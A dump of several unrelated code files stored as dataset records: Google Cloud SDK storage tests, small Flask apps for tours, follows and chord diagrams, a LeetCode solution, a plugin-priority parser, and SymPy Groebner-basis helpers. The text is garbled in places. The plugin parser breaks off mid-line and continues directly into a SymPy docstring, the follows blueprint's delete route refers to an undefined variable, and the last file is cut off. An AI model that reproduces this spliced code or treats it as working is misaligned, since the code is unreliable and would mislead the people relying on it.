All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for googlecloudsdk.api_lib.storage.storage_api.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom apitools.base.py.testing import mock as api_mock\n\nfrom googlecloudsdk.api_lib.storage import storage_api\nfrom googlecloudsdk.api_lib.storage import storage_util\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.calliope import exceptions\nfrom tests.lib import sdk_test_base\nfrom tests.lib import test_case\nfrom tests.lib.apitools import http_error\nfrom tests.lib.surface.app import cloud_storage_util\n\n\nclass GetObjectTest(sdk_test_base.SdkBase):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://mybucket/myobject')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n def testGetObject(self):\n self.apitools_client.objects.Get.Expect(\n self.storage_msgs.StorageObjectsGetRequest(\n bucket='mybucket', object='myobject'),\n self.storage_msgs.Object(name='myobject'))\n\n self.assertEqual(\n self.storage_client.GetObject(self._OBJECT),\n self.storage_msgs.Object(name='myobject'))\n\n\nclass CopyFileTest(sdk_test_base.SdkBase):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = core_apis.GetMessagesModule('storage', 'v1')\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = self.Touch(\n self.temp_path, self.object_name, contents='somecontentshere')\n self.file_size = os.path.getsize(self.local_path)\n self.insert_request = self.storage_msgs.StorageObjectsInsertRequest(\n bucket=self._BUCKET.bucket,\n name=self.target_path,\n object=self.storage_msgs.Object(size=self.file_size)\n )\n\n def testSuccess(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n self.storage_msgs.Object(size=self.file_size)\n )\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n exception=exception\n )\n\n with self.assertRaisesRegex(\n exceptions.BadFileException,\n r'Could not copy \\[{}\\] to \\[{}\\]. 
Please retry: Invalid request API '\n r'reason: Invalid request.'.format(\n re.escape(self.local_path), self.target_path)):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n def testSizeMismatch(self):\n self.apitools_client.objects.Insert.Expect(\n self.insert_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=self.file_size - 1)\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileToGCS(self._BUCKET,\n self.local_path,\n self.target_path)\n\n\nclass CopyFileFromGCSTest(sdk_test_base.WithFakeAuth):\n\n _BUCKET = storage_util.BucketReference.FromBucketUrl('gs://mybucket/')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.object_name = 'foobar'\n self.target_path = 'mytargetpath'\n self.local_path = os.path.join(self.temp_path, self.object_name)\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket=self._BUCKET.bucket,\n object=self.target_path)\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n self.storage_msgs.Object(size=0))\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testApiError(self):\n exception = http_error.MakeHttpError()\n\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n exception=exception\n )\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n def testSizeMismatch(self):\n # Use object() instead of None because when the mock is given None, it uses\n # a real client\n response = object()\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n response)\n self.apitools_client.objects.Get.Expect(\n self.get_request,\n # Return an object with a different size.\n self.storage_msgs.Object(size=-1))\n\n with self.assertRaises(exceptions.BadFileException):\n self.storage_client.CopyFileFromGCS(self._BUCKET,\n self.target_path,\n self.local_path)\n\n\nclass ReadObjectTest(sdk_test_base.WithFakeAuth):\n\n _OBJECT = storage_util.ObjectReference.FromUrl('gs://bucket/object')\n\n def SetUp(self):\n self.apitools_client = api_mock.Client(\n core_apis.GetClientClass('storage', 'v1'))\n self.apitools_client.Mock()\n self.addCleanup(self.apitools_client.Unmock)\n\n self.storage_client = storage_api.StorageClient(self.apitools_client)\n self.storage_msgs = self.apitools_client.MESSAGES_MODULE\n\n self.get_request = self.storage_msgs.StorageObjectsGetRequest(\n bucket='bucket',\n object='object')\n\n def testSuccess(self):\n # TODO(b/33202933): There's a TODO in the apitools testing code to add\n # support for upload/download in mocked apitools clients; when that is\n # resolved, test a non-empty mocked file here.\n # Use object() instead of None because when the mock is given None, it uses\n # 
a real client\n    response = object()\n    self.apitools_client.objects.Get.Expect(\n        self.get_request,\n        response)\n    self.assertEqual(\n        self.storage_client.ReadObject(self._OBJECT).read(),\n        b'')\n\n  def testApiError(self):\n    exception = http_error.MakeHttpError()\n\n    self.apitools_client.objects.Get.Expect(\n        self.get_request,\n        exception=exception\n    )\n\n    with self.assertRaises(exceptions.BadFileException):\n      self.storage_client.ReadObject(self._OBJECT)\n\n\nclass ListBucketTest(cloud_storage_util.WithGCSCalls):\n\n  _BUCKET_NAME = 'testbucket'\n\n  _SHA1_SUMS = {\n      'content': '040f06fd774092478d450774f5ba30c5da78acc8',\n      'content2': '6dc99d4757bcb35eaaf4cd3cb7907189fab8d254',\n      'content3': '32c5ff3108bcea43b1c4826d66f43a3ae570e663'\n  }\n\n  def SetUp(self):\n    self.bucket = storage_util.BucketReference.FromBucketUrl(\n        'gs://{0}/'.format(self._BUCKET_NAME))\n    self.storage_client = storage_api.StorageClient()\n\n  def testListBucket(self):\n    self.ExpectList([('a', 'content'), ('b', 'content'), ('c', 'content2')])\n\n    names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n    self.assertEqual(\n        names,\n        set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2']]))\n\n  def testListBucketMultiplePages(self):\n    self.ExpectListMulti([\n        [('a', 'content'), ('b', 'content')],\n        [('c', 'content2'), ('d', 'content3')]])\n    names = set(o.name for o in self.storage_client.ListBucket(self.bucket))\n    self.assertEqual(\n        names,\n        set([self._SHA1_SUMS['content'], self._SHA1_SUMS['content2'],\n             self._SHA1_SUMS['content3']]))\n\n\nclass DeleteBucketTest(test_case.TestCase):\n\n  _BUCKET_NAME = 'testbucket'\n\n  def SetUp(self):\n    self.apitools_client = api_mock.Client(\n        core_apis.GetClientClass('storage', 'v1'))\n    self.apitools_client.Mock()\n    self.addCleanup(self.apitools_client.Unmock)\n\n    self.storage_client = storage_api.StorageClient(self.apitools_client)\n\n  def testDeleteBucket(self):\n    bucket = storage_util.BucketReference.FromBucketUrl(\n        'gs://{0}/'.format(self._BUCKET_NAME))\n    self.apitools_client.buckets.Delete.Expect(\n        self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteRequest(\n            bucket=self._BUCKET_NAME),\n        self.apitools_client.MESSAGES_MODULE.StorageBucketsDeleteResponse()\n    )\n\n    self.storage_client.DeleteBucket(bucket)\n","sub_path":"google-cloud-sdk/lib/tests/unit/api_lib/storage/storage_api_test.py","file_name":"storage_api_test.py","file_ext":"py","file_size_in_byte":10181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"619496392","text":"from random import sample\r\nfrom flask import Flask, render_template\r\nfrom data import *\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef main():\r\n    random_tours = {}\r\n    rand_list = sample(range(1,tours.__len__()), 6) #генерирую 6 случайных значений без повторений\r\n    for i in rand_list:\r\n        random_tours[i] = tours[i]\r\n\r\n    template_context = dict(title=title, subtitle=subtitle, description=description, tours=random_tours, departures=departures)\r\n    output = render_template(\"index.html\", **template_context)\r\n    return output\r\n\r\n@app.route('/departures/<departure>')\r\ndef show_dep(departure):\r\n\r\n    tours_by_dep = {}\r\n    for ind, tour in tours.items():\r\n        if tour['departure'] == departure:\r\n            tours_by_dep[ind] = tour\r\n\r\n    tours_count = tours_by_dep.__len__()\r\n\r\n    min_price = min(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n    max_price = max(tours_by_dep.values(), key=lambda k: k['price'])['price']\r\n    min_days = min(tours_by_dep.values(), 
key=lambda k: k['nights'])['nights']\r\n max_days = max(tours_by_dep.values(), key=lambda k: k['nights'])['nights']\r\n\r\n template_context = dict(departures=departures, title=title, departure=departure, selected_tours=tours_by_dep, tours_count=tours_count, min_price=min_price, max_price=max_price, min_days=min_days, max_days=max_days)\r\n output = render_template(\"departure.html\", **template_context)\r\n return output\r\n\r\n@app.route('/tours/')\r\ndef show_tour(id):\r\n tour = tours[int(id)]\r\n output = render_template(\"tour.html\", departures=departures, title=title, tour=tour)\r\n return output\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254221254","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n给定一个正整数 n ,输出外观数列的第 n 项。\n\n「外观数列」是一个整数序列,从数字 1 开始,序列中的每一项都是对前一项的描述。\n\n你可以将其视作是由递归公式定义的数字字符串序列:\n\ncountAndSay(1) = \"1\"\ncountAndSay(n) 是对 countAndSay(n-1) 的描述,然后转换成另一个数字字符串。\n前五项如下:\n\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n第一项是数字 1 \n描述前一项,这个数是 1 即 “ 一 个 1 ”,记作 \"11\"\n描述前一项,这个数是 11 即 “ 二 个 1 ” ,记作 \"21\"\n描述前一项,这个数是 21 即 “ 一 个 2 + 一 个 1 ” ,记作 \"1211\"\n描述前一项,这个数是 1211 即 “ 一 个 1 + 一 个 2 + 二 个 1 ” ,记作 \"111221\"\n要 描述 一个数字字符串,首先要将字符串分割为 最小 数量的组,每个组都由连续的最多 相同字符 组成。然后对于每个组,先描述字符的数量,然后描述字符,形成一个描述组。要将描述转换为数字字符串,先将每组中的字符数量用数字替换,再将所有描述组连接起来。\n\n例如,数字字符串 \"3322251\" 的描述如下图:\n\n\n \n\n示例 1:\n\n输入:n = 1\n输出:\"1\"\n解释:这是一个基本样例。\n示例 2:\n\n输入:n = 4\n输出:\"1211\"\n解释:\ncountAndSay(1) = \"1\"\ncountAndSay(2) = 读 \"1\" = 一 个 1 = \"11\"\ncountAndSay(3) = 读 \"11\" = 二 个 1 = \"21\"\ncountAndSay(4) = 读 \"21\" = 一 个 2 + 一 个 1 = \"12\" + \"11\" = \"1211\"\n \n\n提示:\n\n1 <= n <= 30\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/count-and-say\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n \n\n提示:\n\n1 <= n <= 30\n\n\n固定的数组的生成:\n- 第一个数字固定为1\n- 后面的数字依次为上一个数字序列的读法\n\n思路:\n\"\"\"\n\nimport doctest\n\n\nclass Solution:\n \"\"\"\n >>> s = Solution()\n >>> s.countAndSay(1)\n '1'\n >>> s.countAndSay(4)\n '1211'\n \"\"\"\n\n def countAndSay(self, n: int) -> str:\n s = \"1\"\n # 第一次遍历一次次的生成\n for j in range(1, n):\n t = s[0]\n tmp = \"\"\n count = 0 # 统计重复出现的数字的个数\n # 用来遍历每一次的数字,统计其读法\n for i in range(0, len(s), 1):\n if t == s[i]:\n count += 1\n else:\n tmp = tmp + str(count) + t\n t = s[i]\n count = 1\n if i == len(s) - 1:\n tmp = tmp + str(count) + t # 将结果合并\n s = tmp\n return s\n\n\nif __name__ == \"__main__\":\n doctest.testmod()\n","sub_path":"algorithms/leetcode/medium/0038_外观数列.py","file_name":"0038_外观数列.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"103194456","text":"from flask import Blueprint, render_template, request, url_for, redirect, flash\nfrom models.user import User\nfrom models.images import Image\nfrom models.following import Following\nfrom flask_login import current_user\n\nfollows_blueprint = Blueprint(\"follows\",\n __name__,\n template_folder='templates')\n\n\n@follows_blueprint.route('/', methods=['POST'])\ndef create(idol_id):\n idol = User.get_or_none(User.id == idol_id)\n\n if not idol:\n flash('No user found with this id')\n return redirect(url_for('sessions.index'))\n # modify this to show homepage HOME in sessions\n\n new_follow = Following(fan_id=current_user.id, idol_id=idol.id)\n\n if not new_follow.save():\n flash('Error in following this user', 
'warning')\n return redirect(url_for('users.show', username=idol.username))\n\n else:\n flash(f'You are now following {idol.username}')\n return redirect(url_for('users.show', username=idol.username))\n\n flash('Following request has sent ! Please wait for approval.')\n\n\n@follows_blueprint.route('//delete', methods=['POST'])\ndef delete(idol_id):\n follow = Following.get_or_none(Following.idol_id == idol.id) and (\n Following.fan_id == current_user.id)\n\n if follow.delete_instance():\n flash(f'You have unfollowed {follow.idol.username}')\n return redirect(url_for('users.show', username=follow.idol.username))\n","sub_path":"instagram_web/blueprints/follows/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"492125369","text":"import glob\nimport os\nfrom logs import logs as log\nlogs=log()\ndef qparse(questionlist):\n\tdef checkdicts(checkvar, plugin):\n\t\tplugvals=plugin.values()[0]\n\t\tfor plugdict in plugvals:\n\t\t\tlogs.write(\"Checking dictionary {0}\".format(plugdict),'trying')\n\t\t\tif plugdict.keys()[0]==checkvar:\n\t\t\t\tlogs.write(\"Found {0} dictionary\".format(checkvar), 'success')\n\t\t\t\tcheckval=plugdict.values()[0]\n\t\t\t\treturn checkval\n\tlogs.write(\"Parsing possible plugins\", 'trying')\n\tpriority=open('priority.txt').read().split('\\n')\n\tprioritized=[]\n\tfor plugin in questionlist:\n\t\tplugname=plugin.keys()[0]\n\t\tlogs.write(\"Checking plugin {0}\".format(plugname), 'working')\n\t\tlogs.write(\"Checking to see if the plugin is in the priority list\", 'working')\n\t\tplugname=plugin.keys()[0]\n\t\tfor line in priority:\n\t\t\tname=line.split(':')[1]\n\t\t\tstatus=line.split(':')[0]\n\t\t\tlogs.write('Item {0} in priority list is {1}'.format(status, name), 'working')\n\t\t\tif plugname.lower()==name.lower():\n\t\t\t\tlogs.write(\"Plugin name and priority list item match\", 'success')\n\t\t\t\tprioritized.append({status:plugin})\n\tlogs.write(\"Going through list of prioritized plugins\", 'trying')\n\tlogs.write(prioritized, 'working')\n\tnum=None\n\tfor plugin in prioritized:\n\t\tlogs.write(\"Looking at plugin {0}\".format(plugin), 'working')\n\t\tstatus=plugin.keys()[0]\n\t\tplugname=plugin.values()[0].keys()[0]\n\t\tlogs.write(\"Plugin {0} has priority {1}\".format(plugname,status), 'working')\n\t\tstatus=int(status)\n\t\tif num==None:\n\t\t\tnum=status\n\t\telse:\n\t\t\tif status>> from sympy.abc import x, y\r\n >>> from sympy import groebner\r\n\r\n >>> F = [x**2 - 3*y - x + 1, y**2 - 2*x + y - 1]\r\n >>> G = groebner(F, x, y, order='grlex')\r\n\r\n >>> list(G.fglm('lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n >>> list(groebner(F, x, y, order='lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n\r\n References\r\n ==========\r\n\r\n J.C. Faugere, P. Gianni, D. Lazard, T. Mora (1994). 
Efficient\r\n Computation of Zero-dimensional Groebner Bases by Change of\r\n Ordering\r\n\r\n \"\"\"\r\n opt = self._options\r\n\r\n src_order = opt.order\r\n dst_order = monomial_key(order)\r\n\r\n if src_order == dst_order:\r\n return self\r\n\r\n if not self.is_zero_dimensional:\r\n raise NotImplementedError(\"can't convert Groebner bases of ideals with positive dimension\")\r\n\r\n polys = list(self._basis)\r\n domain = opt.domain\r\n\r\n opt = opt.clone(dict(\r\n domain=domain.get_field(),\r\n order=dst_order,\r\n ))\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, src_order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n G = matrix_fglm(polys, _ring, dst_order)\r\n G = [Poly._from_dict(dict(g), opt) for g in G]\r\n\r\n if not domain.is_Field:\r\n G = [g.clear_denoms(convert=True)[1] for g in G]\r\n opt.domain = domain\r\n\r\n return self._new(G, opt)\r\n\r\n def reduce(self, expr, auto=True):\r\n \"\"\"\r\n Reduces a polynomial modulo a Groebner basis.\r\n\r\n Given a polynomial ``f`` and a set of polynomials ``G = (g_1, ..., g_n)``,\r\n computes a set of quotients ``q = (q_1, ..., q_n)`` and the remainder ``r``\r\n such that ``f = q_1*f_1 + ... + q_n*f_n + r``, where ``r`` vanishes or ``r``\r\n is a completely reduced polynomial with respect to ``G``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner, expand\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**4 - x**2 + y**3 + y**2\r\n >>> G = groebner([x**3 - x, y**3 - y])\r\n\r\n >>> G.reduce(f)\r\n ([2*x, 1], x**2 + y**2 + y)\r\n >>> Q, r = _\r\n\r\n >>> expand(sum(q*g for q, g in zip(Q, G)) + r)\r\n 2*x**4 - x**2 + y**3 + y**2\r\n >>> _ == f\r\n True\r\n\r\n \"\"\"\r\n poly = Poly._from_expr(expr, self._options)\r\n polys = [poly] + list(self._basis)\r\n\r\n opt = self._options\r\n domain = opt.domain\r\n\r\n retract = False\r\n\r\n if auto and domain.is_Ring and not domain.is_Field:\r\n opt = opt.clone(dict(domain=domain.get_field()))\r\n retract = True\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, opt.order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n Q, r = polys[0].div(polys[1:])\r\n\r\n Q = [Poly._from_dict(dict(q), opt) for q in Q]\r\n r = Poly._from_dict(dict(r), opt)\r\n\r\n if retract:\r\n try:\r\n _Q, _r = [q.to_ring() for q in Q], r.to_ring()\r\n except CoercionFailed:\r\n pass\r\n else:\r\n Q, r = _Q, _r\r\n\r\n if not opt.polys:\r\n return [q.as_expr() for q in Q], r.as_expr()\r\n else:\r\n return Q, r\r\n\r\n\r\n def contains(self, poly):\r\n \"\"\"\r\n Check if ``poly`` belongs the ideal generated by ``self``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**3 + y**3 + 3*y\r\n >>> G = groebner([x**2 + y**2 - 1, x*y - 2])\r\n\r\n >>> G.contains(f)\r\n True\r\n >>> G.contains(f + 1)\r\n False\r\n\r\n \"\"\"\r\n return self.reduce(poly)[1] == 0\r\n\r\ndef iter_groebner(seq,n, ring, method=None):\r\n \"\"\"\r\n Computes Groebner basis for a set of polynomials in `K[X]`.\r\n\r\n Wrapper around the (default) improved Buchberger and the other algorithms\r\n for computing Groebner bases. 
The choice of algorithm can be changed via\r\n ``method`` argument or :func:`setup` from :mod:`sympy.polys.polyconfig`,\r\n where ``method`` can be either ``buchberger`` or ``f5b``.\r\n\r\n \"\"\"\r\n\r\n domain, orig = ring.domain, None\r\n if not domain.is_Field or not domain.has_assoc_Field:\r\n try:\r\n orig, ring = ring, ring.clone(domain=domain.get_field())\r\n except DomainError:\r\n raise DomainError(\"can't compute a Groebner basis over %s\" % domain)\r\n else:\r\n seq = [ s.set_ring(ring) for s in seq ]\r\n\r\n G = _incr_buch(seq,n, ring)\r\n\r\n if orig is not None:\r\n G = [ g.clear_denoms()[1].set_ring(orig) for g in G ]\r\n\r\n return G\r\n\r\ndef _incr_buch(f,n, ring):\r\n \"\"\"\r\n Incremental Computation of a reduced Grobner basis, given that f[:-1] is a reduced Grobner basis\r\n and f[-1] is a new polynomial to add into the basis.\r\n New polynomial f[-1] is assumed to be reduced by the grobner basis f[:-1] already.\r\n\r\n \"\"\"\r\n order = ring.order\r\n domain = ring.domain\r\n\r\n monomial_mul = ring.monomial_mul\r\n monomial_div = ring.monomial_div\r\n monomial_lcm = ring.monomial_lcm\r\n\r\n def select(P):\r\n # normal selection strategy\r\n # select the pair with minimum LCM(LM(f), LM(g))\r\n pr = min(P, key=lambda pair: order(monomial_lcm(f[pair[0]].LM, f[pair[1]].LM)))\r\n return pr\r\n\r\n def normal(g, J):\r\n h = g.rem([ f[j] for j in J ])\r\n\r\n if not h:\r\n return None\r\n else:\r\n h = h.monic()\r\n\r\n if not h in I:\r\n I[h] = len(f)\r\n f.append(h)\r\n\r\n return h.LM, I[h]\r\n\r\n def update(G, B, ih):\r\n # update G using the set of critical pairs B and h\r\n # [BW] page 230\r\n h = f[ih]\r\n mh = h.LM\r\n\r\n # filter new pairs (h, g), g in G\r\n C = G.copy()\r\n D = set()\r\n\r\n while C:\r\n # select a pair (h, g) by popping an element from C\r\n ig = C.pop()\r\n g = f[ig]\r\n mg = g.LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n def lcm_divides(ip):\r\n # LCM(LM(h), LM(p)) divides LCM(LM(h), LM(g))\r\n m = monomial_lcm(mh, f[ip].LM)\r\n return monomial_div(LCMhg, m)\r\n\r\n # HT(h) and HT(g) disjoint: mh*mg == LCMhg\r\n if monomial_mul(mh, mg) == LCMhg or (\r\n not any(lcm_divides(ipx) for ipx in C) and\r\n not any(lcm_divides(pr[1]) for pr in D)):\r\n D.add((ih, ig))\r\n\r\n E = set()\r\n\r\n while D:\r\n # select h, g from D (h the same as above)\r\n ih, ig = D.pop()\r\n mg = f[ig].LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n if not monomial_mul(mh, mg) == LCMhg:\r\n E.add((ih, ig))\r\n\r\n # filter old pairs\r\n B_new = set()\r\n\r\n while B:\r\n # select g1, g2 from B (-> CP)\r\n ig1, ig2 = B.pop()\r\n mg1 = f[ig1].LM\r\n mg2 = f[ig2].LM\r\n LCM12 = monomial_lcm(mg1, mg2)\r\n\r\n # if HT(h) does not divide lcm(HT(g1), HT(g2))\r\n if not monomial_div(LCM12, mh) or \\\r\n monomial_lcm(mg1, mh) == LCM12 or \\\r\n monomial_lcm(mg2, mh) == LCM12:\r\n B_new.add((ig1, ig2))\r\n\r\n B_new |= E\r\n\r\n # filter polynomials\r\n G_new = set()\r\n\r\n while G:\r\n ig = G.pop()\r\n mg = f[ig].LM\r\n\r\n if not monomial_div(mg, mh):\r\n G_new.add(ig)\r\n\r\n G_new.add(ih)\r\n\r\n return G_new, B_new\r\n # end of update ################################\r\n\r\n if not f:\r\n return []\r\n f1 = [func for func in f[:-n]]\r\n for p in f[-n:]:\r\n r = p.rem(f1)\r\n if r != 0:\r\n f1.append(r)\r\n f = f1\r\n I = {} # ip = I[p]; p = f[ip]\r\n F = set()\r\n G = set() # set of indices of intermediate would-be Groebner basis\r\n CP = set() # set of pairs of indices of critical pairs\r\n\r\n for i, h in enumerate(f):\r\n I[h] = i #Setup polynomial-index dictionary\r\n 
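# The partition below: indices of the already-reduced basis f[:-n] go\r\n # straight into G, while the n newly added polynomials go into F and are\r\n # fed through the Buchberger update loop one at a time.\r\n 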
if i >= len(f)-n:\r\n F.add(i)\r\n else:\r\n G.add(i)\r\n \r\n #####################################\r\n # algorithm GROEBNERNEWS2 in [BW] page 232\r\n while F:\r\n # select p with minimum monomial according to the monomial ordering\r\n h = min([f[x] for x in F], key=lambda f: order(f.LM))\r\n ih = I[h]\r\n F.remove(ih)\r\n G, CP = update(G, CP, ih)\r\n\r\n # count the number of critical pairs which reduce to zero\r\n reductions_to_zero = 0\r\n\r\n while CP:\r\n ig1, ig2 = select(CP)\r\n CP.remove((ig1, ig2))\r\n \r\n h = spoly(f[ig1], f[ig2], ring)\r\n # ordering divisors is on average more efficient [Cox] page 111\r\n G1 = sorted(G, key=lambda g: order(f[g].LM))\r\n ht = normal(h, G1)\r\n\r\n if ht:\r\n G, CP = update(G, CP, ht[1])\r\n else:\r\n reductions_to_zero += 1\r\n\r\n ######################################\r\n # now G is a Groebner basis; reduce it\r\n Gr = set()\r\n\r\n for ig in G:\r\n ht = normal(f[ig], G - set([ig]))\r\n\r\n if ht:\r\n Gr.add(ht[1])\r\n\r\n Gr = [f[ig] for ig in Gr]\r\n\r\n # order according to the monomial ordering\r\n Gr = sorted(Gr, key=lambda f: order(f.LM), reverse=True)\r\n\r\n return Gr\r\n\r\nimport numpy as np\r\nfrom math import floor\r\nimport time\r\nfrom itertools import product\r\nfrom itertools import combinations\r\nfrom sympy import Matrix, var\r\n\r\ndef make_linearEqns(A,z):\r\n #Takes matrix A and variable list z and converts it into a list of linear equations\r\n zmat = Matrix(z)\r\n A = Matrix(A)\r\n A = A.rref()[0]\r\n lin_fcns = A*zmat\r\n lin_fcns = [f for f in lin_fcns if f != 0]\r\n lin_fcns = lin_fcns[::-1]\r\n return(list(lin_fcns))\r\n\r\ndef hypercube_matrix(R):\r\n A = np.zeros((len(R),len(R[0])))\r\n for i,r in enumerate(R):\r\n for j,letter in enumerate(r):\r\n if letter == '0':\r\n A[i,j] = -1\r\n else:\r\n A[i,j] = int(letter)\r\n return(A)\r\n\r\ndef hypercube_polys(k):\r\n variable_string = ''\r\n num_digits = len(str(k))\r\n for i in range(0,k):\r\n count = str(i+1).zfill(num_digits)\r\n variable = ',z'+count\r\n variable_string = variable_string +variable\r\n variable_string = variable_string[1:]\r\n z = var(variable_string)\r\n P = []\r\n f = 0\r\n for i in range(k):\r\n P.append(z[i]*(z[i]-1)*(z[i]+1))\r\n f = f + z[i]**2\r\n fs = []\r\n for i in range(floor(k/2)):\r\n fi = f-2*(i+1)\r\n fs.append(fi)\r\n return(P,fs,z)\r\n\r\ndef check_hcube_resolving(R,k):\r\n #Create matrix A from R\r\n A = hypercube_matrix(R)\r\n #Get pre-computed Groebner basis and variables for H_k,2\r\n G,fs,z = hypercube_polys(k)\r\n #Get linear functions from A matrix\r\n lin_fcns = make_linearEqns(A,z)\r\n n = len(lin_fcns)\r\n #Get Grobner basis of P and linear functions\r\n G = groebnerbasis(True,G+lin_fcns,n,order = 'lex')\r\n for i,fi in enumerate(fs):\r\n #Compute Grobner basis of G+fi\r\n Gi = groebnerbasis(True,list(G)+[fi],1,order = 'lex')\r\n #Solutions iff Gi neq 1, if Gi neq 1 then R is not resolving\r\n if not (list(Gi) == [1]):\r\n return False\r\n return True","sub_path":"Lucas/Generate Resolving Sets/helper_funcs.py","file_name":"helper_funcs.py","file_ext":"py","file_size_in_byte":17829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216736607","text":"from flask import (\n render_template,\n request,\n Blueprint,\n make_response,\n send_file\n )\n\nimport io # io and send_file are used by download_as below\n\nfrom diagram import MultiFingerChord\nfrom .forms import ChordForm, DownloadForm\n\nimport cairosvg\nfrom wand.image import Image\n\nimport yaml\n\nfrom .config import DEFAULT_STYLE\n\nmy_view = Blueprint('my_view', __name__)\n\n@my_view.route('/', methods=['GET', 'POST'])\ndef home():\n def create_diagram(chord_form):\n \"\"\"Create chord diagram and return filename.\"\"\"\n extras = [\n dict(\n zip(['string', 'fret', 'finger'], x.split(',')[:3])\n )\n for x in chord_form.extras.data.splitlines()\n ]\n\n chord_style = DEFAULT_STYLE\n\n chord_style['drawing']['label_all_frets'] = chord_form.label_all.data\n print(chord_style)\n\n\n diagram = MultiFingerChord(\n positions=chord_form.positions.data,\n fingers=chord_form.fingers.data,\n barre=chord_form.barre.data,\n title=chord_form.title.data,\n style=chord_style,\n extras=extras\n )\n\n # This is obviously dumb, but works for now\n filename = 'static/ukulele/{title}_{pos}_{fin}_{bar}.svg'.format(\n title=chord_form.title.data,\n pos=chord_form.positions.data,\n fin=chord_form.fingers.data,\n bar=chord_form.barre.data,\n )\n diagram.save(filename)\n\n return filename\n\n chord_form = ChordForm(request.form)\n dl_form = DownloadForm(request.form)\n\n if request.method == 'POST':\n # Diagram\n if 